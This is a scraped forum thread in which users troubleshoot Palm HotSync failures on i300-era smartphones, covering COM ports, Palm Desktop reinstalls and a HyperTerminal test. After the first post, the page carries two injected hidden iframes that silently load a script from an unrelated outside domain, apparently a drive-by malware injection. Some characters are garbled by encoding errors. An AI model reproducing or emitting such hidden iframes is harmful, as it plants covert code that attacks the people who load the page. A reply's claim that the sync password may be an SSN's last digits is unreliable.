+ Reply to Thread

Hotsync does not work

Hello all,

Happy New Year to all. I helped my sis-in-law with her new Samsung phone. I did not have any problem installing the disk, the PC and handheld "see" each other fine when I ran hotsync. It was just that my PC spoke Russian while the handheld French. All I've got was "synchronization failed" in the log file. Anyone ever experienced this? How/what should I do to fix this? Thanks all.

tt<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Beams from above...

Parlais Vous Hotsync?

Wow - sounds like one of 'dem communication problems to me...

Could you tell a little bit more? Is there evidence that the PC and handheld recognize each other? If not, right click on the hotsync icon in the system tray and make sure "Local Serial" is checked.

If there is evidence that communication is taking place, but no synchronization, right click on the hotsync icon again, choose "Custom" and make sure that the conduit is set up to "Synchronize the files" for the Outlook features.

Since I am not a technical whiz, my second plan of attack is to perform a hard reset on the handheld, uninstall the hotsync and Mirror applications from the PC, and start all over again. Your Outlook data files are not in any danger with a reinstall like this.

John

Administrator

Arrow

save the cold reset.

pastor john is on the correct track.

i would not use the 3.1 palm on the cd but go to palm and dl the 4.0.1 desktop. this newer versin will save your user installed apps whereas the 3.1 version will not.

for your first hotsync, it will pask the password. it should be your last 4 digits of your phone number or SSN, or "0000".

Hello Pastor John,

Thanks for replying to my post. I had done all that you suggested only to keep getting "synchronization failed" in the log file each time. Not sure what to do next though. I will follow Marctronixx's suggestion and hope for better result. Thank you both for your time.

tt

Talking possible solutions for sync failed errors

Local Sync (direct sync between the Palm and the Desktop):

„h Verify that the HotSync Manager is in the System Tray
    „h If not go to the Start menu and open the HotSync Manager from underneath the KYOCERA smartphone Desktop menu option.
    „h Try to sync (if sync fails continue to the next step)

„h Right click on the HotSync Manager
    „h Make sure that the Local option is checked
    „h Go to Setup
    „h Make sure the correct comport is selected

„h Right click on the HotSync Manager
    „h Go to Setup
    „h Turn down the speed to 9600

„h Check serial connection between the computer and cradle and make sure it is secure
    „h Check docking connection between the phone and the cradle and make sure it is secure
    „h Check for application conflicts (Push the ¡§Ctrl¡¨, ¡§Alt¡¨ and ¡§Delete¡¨ buttons and end task on all applications except Explorer and Systray.
    „h Check all Port and IRQ conflicts. (make sure Infrared is turned off)

„h Perform a HyperTerminal test:
    1. Go to the Start menu
    2. Got to Programs
    3. Go to Accessories (for Windows 95 and NT go to step 5)
    4. Go to Communications
    5. Go to HyperTerminal (for Windows NT, 2000 and ME go to step 7)
    6. Double click on the Hypertrm.exe Icon
    7. For the name of the connection type: test, and click on the ¡§OK¡¨ button
    8. On the ¡§Connect To¡¨ screen go to ¡§Connect using¡¨ and select proper COM Port (ex. COM1) and click on the ¡§OK¡¨ button
    9. In the Port Settings screen go to ¡§Flow control¡¨ and change it to ¡§None¡¨ and click on the ¡§OK¡¨ button
    10. At this point you will have a blank HyperTerminal screen, press the HotSync button the cradle.
    „X If you get any symbols appearing on the screen then have the customer go to the store and test out the cradle and the phone.
    „X If you get a blank screen then have the customer test out the port on the computer. Have the customer plug another device into it and see if it works. (Possible bad COM port).

Unhappy Trouble hotsyncing w/ Desktop 4.01

Jst DLed Palm desktop 4.01 and my phone won't sync...at all. I have used the desktop version that came w/ it and it worked w/o a hitch.
    Any ideas?

Thanks

HotSync problem

Greetings,

I just got an I300 and am having a problem with the address book sync operation.

Maybe I dont understand what to do. The system seems to sync fine but for some reason the address book in the pc is not updating with the phone. I just entered in all my addresses into the pc and tried to sync and the phone was not updated but the sync log said all was ok.

Is there something else I need to do? I noticed the address book is not specifically on the list in the HotSync custom box.

Thanks
    Dave

First of All

Make sure that you did not sync any old palm pilot information with your new I300. The manual specifically recommends that you do not do this because some programs are not compatible with the I300. Are you using a 3rd party app for your address book?

Next, do you have Palm Desktop 4.01? You can download this for free at www.palm.com. It is a definite must because it will backup all of your 3rd party apps.

Next, in your hot sync manager, under custom, try assigning the desktop to override the handheld for your address book.

Next, if you do have any 3rd party apps installed, they could be conflicting with your address book. You might want to uninstall them, and then reinstall them one by one to see which one doesn't work.

If you go back and read the many threads about application compatibility you will find many programs that do not work with the I300. But you will find many programs that will.

Hope some of this info has helped.
    Laurie

Thumbs up Barrtiger

Thanks for the reply.

I am using all the supplied software etc. The version that came with my I300 seems to be 4.01 but it may not have installed properly.

When I look under CUSTOM I only see these items
    Mail
    Expense
    Install
    Install Service Templates
    Install to Card
    System

Since I do not see any Address Book I guess it did not install?

I have never had a palm before so I dont know if this is ok or not but it would seem to need an entry for Address Book to sync properly.

Just to be sure, I will download and instll the version from palm.com

Thanks
    Dave

Cool Download Success

Just downloaded the software from the site and that solved the problem.

Eventhough the orginal installation did not receive any errors it apparently did not complete.

I did not see any way to manually install the Address Book to the CUSTOM conduit so was puzzled as to how to accomplish this but the reinstall from www.palm.com solved the problem.

Thanks

Talking Happy to Help

DavidHP:

I'm happy that the reinstall worked for you. I have had that happen to me before where the address book stops syncing for some reason. I use Action Names Datebook. I usually just uninstall Palm Desktop and reinstall it and all works well again.

I can't really say why it stops working though.

Glad everything worked out,
    Laurie

Hotsyncing with Dell Inspiron 8000

My father got an i300 and he is unable to sync it with
    his Dell Inspiron 8000. He attached the phone to the
    serial port and installed the Hotsync software. But
    it won't sync. Nada, zilch.

In Device Manager, COM1 shows up fine. He also has the
    built-in modem, listed as on "COM3". On a hunch, I went
    and tried to add a Standard Modem 19,200 as a diagnostic
    to see how it sees COM1 and to see if it could see the
    phone, but when it came to the part about "install this
    on the selected port", NO COM PORTS WERE VISIBLE!!!

Obviously, if add-a-modem doesn't see COM1, Hotsync
    won't see it either. But the port IS there in Device
    Manager.

Anybody have any experience with this?

Any help would be greatly appreciated.

Thanks,

/Jelks

I am not 100% sure so you may want to contact Dell, but i think that on the Inspirons if the infrared port is activated then the serial is disabled. You have to go to the BIOS of the machine to change this.

See if he can hotsync via infrared.

no transfer to PC

I could use some hotsync help...Even though I set it to phone overrides desktop, no files transfer to my desktop. I did notice that if I go to Calm/backup all my apps are there, but when I open the datebook, address book etc. on the desktop, it's empty! Any suggestions?

yc
    yc

more hotsync trouble!

Now I've really done it. I uninstalled and reinstalled Palm 4.0.1 but now my phone hangs on "identifying user" during a hotsync and then stops. Any help for this novice?

yc
    yc

figured out hotsync problem

There seems to be a problem with the Palm 4.0.1 app packaged with the phone. I uninstalled it and then reinstalled it from the website and everything was fixed.

Talking to myself,
    yc

Administrator

Arrow

it could have been an issues with uninstalling the conduits and reinstaling them.

i dont think the software with the CD was the issue.. you may just only needed to reinstall it...